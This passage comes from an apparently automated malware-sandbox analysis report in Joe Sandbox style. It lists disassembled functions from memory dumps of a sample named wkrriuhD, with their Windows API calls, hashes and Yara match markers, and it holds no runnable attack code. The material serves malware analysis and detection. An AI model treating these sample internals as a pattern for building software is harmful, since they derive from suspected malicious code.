                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                                                                                          • Instruction ID: ecb68656b34b73c70a857b42148ea328f8e4172c0accb7cf6435e3ab80b7b7e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3741E232A002049FCB24DFBCC885A5EBBA5FF88314F1545AAE955EB391E731AD01CB80
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404276 Relevance: 7.6, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: IS_STRUC(base->tpMask)$IS_STRUC(derv->tpMask)$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$derv->tpClass.tpcFlags & CF_HAS_BASES
                                                                                                                                                                                          • API String ID: 0-131784352
                                                                                                                                                                                          • Opcode ID: fb1bc3a81ee95ff01b21cbe901d4932e46fe31dd037e4dd5e9f2a02a155a0d32
                                                                                                                                                                                          • Instruction ID: ffc6d6ff1f84cd42ec22ab39dec13b0b7ff5da0dc2e01e5e5f00b47da449b396
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb1bc3a81ee95ff01b21cbe901d4932e46fe31dd037e4dd5e9f2a02a155a0d32
                                                                                                                                                                                          • Instruction Fuzzy Hash: E141D3B1B04304A7EB108A12DC46BAB77609BD0714F1C907BFE047A2C5D37DD991C29A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1238112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,1235DD01,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01), ref: 12381179
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 123811B1
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,1235DD01,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01,?), ref: 12381202
                                                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01,?,00000002,00000000), ref: 12381214
                                                                                                                                                                                          • __freea.LIBCMT ref: 1238121D
                                                                                                                                                                                            • Part of subcall function 12376137: RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                          • Opcode ID: a662cb9a8bc0f94705c01a32af0c70ff44f913e4c1fc550476bc0d3c7a741e51
                                                                                                                                                                                          • Instruction ID: 23ebe9e4613ffd333672045004a9435d826e3f1ad7206088ad8350c2ff84f50d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a662cb9a8bc0f94705c01a32af0c70ff44f913e4c1fc550476bc0d3c7a741e51
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F31BE76A1021AABDF25CFA5CC84DFE7BA9EB40714B014368EC44DB290E735D961CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403774 Relevance: 7.6, Strings: 6, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • varType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 004037A0
                                                                                                                                                                                          • XX.CPP, xrefs: 004037EA
                                                                                                                                                                                          • XX.CPP, xrefs: 004037B8
                                                                                                                                                                                          • XX.CPP, xrefs: 0040379B
                                                                                                                                                                                          • varType->tpClass.tpcDtorAddr, xrefs: 004037BD
                                                                                                                                                                                          • (errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags, xrefs: 004037EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags$XX.CPP$XX.CPP$XX.CPP$varType->tpClass.tpcDtorAddr$varType->tpClass.tpcFlags & CF_HAS_DTOR
                                                                                                                                                                                          • API String ID: 0-245352462
                                                                                                                                                                                          • Opcode ID: 9e17b5a84bb40e683efab63a096b28be77a14cb4e0ad1c14d600fc567c2284c9
                                                                                                                                                                                          • Instruction ID: 2851ccdddbce733e0003dc1ec9fa6ed38ed7316f3c2f9070df04e85540b4e2d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e17b5a84bb40e683efab63a096b28be77a14cb4e0ad1c14d600fc567c2284c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1921D3B1D002099BCB00EF40C986A6A7BA8AF10715F20817AFC043B2C1D3788E5587EA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14647153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1464715C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1464717F
                                                                                                                                                                                            • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 146471A5
                                                                                                                                                                                          • _free.LIBCMT ref: 146471B8
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 146471C7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                          • Opcode ID: 256856f77888578785a9fabcd2543e9111214d6b42ec896f497ade40655f12e0
                                                                                                                                                                                          • Instruction ID: 0f095fd6acccf0c86ba198f1203db75c5a5a5b6b2da8a79e94520c3a21ad879e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 256856f77888578785a9fabcd2543e9111214d6b42ec896f497ade40655f12e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69018876A012257F6F110AB65C88D7B696DDAD6DAA33D012DFE04D7240DE749C0281B4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1237F363
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1237F386
                                                                                                                                                                                            • Part of subcall function 12376137: RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1237F3AC
                                                                                                                                                                                          • _free.LIBCMT ref: 1237F3BF
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1237F3CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                          • Opcode ID: 0ea0509e3bfeac905872f8cf52d9e7be55e933f0b3e0cbcdcce4618197031c8f
                                                                                                                                                                                          • Instruction ID: 2d9fd041dd4c400bb9a144f41356eb83f6d3490279c00c4061a2739c16e2ebe4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea0509e3bfeac905872f8cf52d9e7be55e933f0b3e0cbcdcce4618197031c8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: B80171B76053257F7B2206BA5C8CCBB7A6DEBC6AA53110229F908C6240DA6CDD02D5B0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12341163 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 12341170
                                                                                                                                                                                          • int.LIBCPMT ref: 12341183
                                                                                                                                                                                            • Part of subcall function 1233E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1233E0D2
                                                                                                                                                                                            • Part of subcall function 1233E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1233E0EC
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 123411C3
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 123411CC
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 123411EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2536120697-0
                                                                                                                                                                                          • Opcode ID: c9dcdd48756be27e863de99208c76d6f3171a069607a25d97553f85f8e59e77e
                                                                                                                                                                                          • Instruction ID: 27d94098e47e7f310a1b194b0b50d15cee33806a987297a40b145977708ce138
                                                                                                                                                                                          • Opcode Fuzzy Hash: c9dcdd48756be27e863de99208c76d6f3171a069607a25d97553f85f8e59e77e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B11CD77A0011C9BCB25DFA5D8449FDBBBC9F80751B200556E845A7190DF70AF41DBD0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005CB13C Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005CB158
                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005CB171
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value___vcrt_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1426506684-0
                                                                                                                                                                                          • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                                          • Instruction ID: 05cc5d0d5dc3713a6351f76c81595380f8b82261c5b4ca64aedac5180b52659f
                                                                                                                                                                                          • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB01B5722087526EB72416F87CAAF666FA9FB41775F28023EF518415F1EF514C81D244
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14645B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,1464636D,14645713,00000000,?,14642249,?,?,14641D66,00000000,?,?,00000000), ref: 14645B7F
                                                                                                                                                                                          • _free.LIBCMT ref: 14645BB4
                                                                                                                                                                                          • _free.LIBCMT ref: 14645BDB
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14645BE8
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14645BF1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                          • Opcode ID: 4fb1e77c933c0ab84f8e6cc91b7d3d7a465e406e1eebc03eed0c4942d70428e9
                                                                                                                                                                                          • Instruction ID: 490148fbf5864089f88eaa16e42ac55f5fbfe2084536295d7243b96ec4a8bb98
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb1e77c933c0ab84f8e6cc91b7d3d7a465e406e1eebc03eed0c4942d70428e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D01F93A206651F7EF1366345CD4D1B2A2EDBF197C73C0128FB15E7A41EE3498024128
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12378299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,1236BC87,00000000,?,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 1237829E
                                                                                                                                                                                          • _free.LIBCMT ref: 123782D3
                                                                                                                                                                                          • _free.LIBCMT ref: 123782FA
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,1233A71B), ref: 12378307
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,1233A71B), ref: 12378310
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                          • Opcode ID: 0263fbbeafd0ee5cee829496d3831ee7ba65e6e9fb604477f3968cce057d10a2
                                                                                                                                                                                          • Instruction ID: 28f31838c35d7e8ef3e16959019cd535de7a7a2d2d22d8b407ed5e0b83a5da00
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0263fbbeafd0ee5cee829496d3831ee7ba65e6e9fb604477f3968cce057d10a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01F97F544B557BDB1216285CC8A9B261E9BC13B67200728FC18E2280EF7CCC01B260
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1234C1F5
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1234C208
                                                                                                                                                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 1234C228
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1234C233
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1234C23B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2951400881-0
                                                                                                                                                                                          • Opcode ID: e95f23367b982920127ee928513248e4d709dedb8e9fd6638abd832ea0cbfe9e
                                                                                                                                                                                          • Instruction ID: 4fb16f745c4932fa3d3b85b09327759d7b74a73da661b1f6b2cb5e034783ebc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: e95f23367b982920127ee928513248e4d709dedb8e9fd6638abd832ea0cbfe9e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 570126F72802256BDA1256D48C88FA7B3FCDB84A81F1006A1FA48D3281EEA09D41C771
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14641E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,146410DF,?,?,?,00000000), ref: 14641E9A
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 14641EAC
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EB3
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EC8
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,146410DF), ref: 14641ED3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                          • Opcode ID: c20e5f94a98ccd16e8a185d04cb2feda64350f30f6fd062fbc1eba903bf40375
                                                                                                                                                                                          • Instruction ID: fd450ad0d53a389e64ce6dd8e73d6a88fde36421add86ab3ad1df17437302984
                                                                                                                                                                                          • Opcode Fuzzy Hash: c20e5f94a98ccd16e8a185d04cb2feda64350f30f6fd062fbc1eba903bf40375
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0892A601120BADB222B19BCC5EBF777CEFD6A68B18001DF608831909B65594392B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146491B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 146491D0
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 146491E2
                                                                                                                                                                                          • _free.LIBCMT ref: 146491F4
                                                                                                                                                                                          • _free.LIBCMT ref: 14649206
                                                                                                                                                                                          • _free.LIBCMT ref: 14649218
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 324994140fff126b3bf84ddf3385b41fd0ace57581a3b0c73c9e2fcde635d477
                                                                                                                                                                                          • Instruction ID: 6231f666cf3733d7e679dc9b69bdf59952144edf15e7d93b0b3b5d2c3957714f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 324994140fff126b3bf84ddf3385b41fd0ace57581a3b0c73c9e2fcde635d477
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0FF7195525097DF21DA64D5C5C1A7FDDEB2065C7784819EA49DBA00CE31F8808A5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14645351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 1464536F
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 14645381
                                                                                                                                                                                          • _free.LIBCMT ref: 14645394
                                                                                                                                                                                          • _free.LIBCMT ref: 146453A5
                                                                                                                                                                                          • _free.LIBCMT ref: 146453B6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 80351875d5ba9127fa1c91f532cdf60e631ecdeb2f1d66b783156a7a4be137b4
                                                                                                                                                                                          • Instruction ID: 6a57bcdfabcd5558616692fb960fea5f80f594d19fc36b86e40f896f820d77cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80351875d5ba9127fa1c91f532cdf60e631ecdeb2f1d66b783156a7a4be137b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0B774915234DBDB22EF24D9D04183FADE724AEC76941AEE9109B750EB3158829B88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D4E2A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
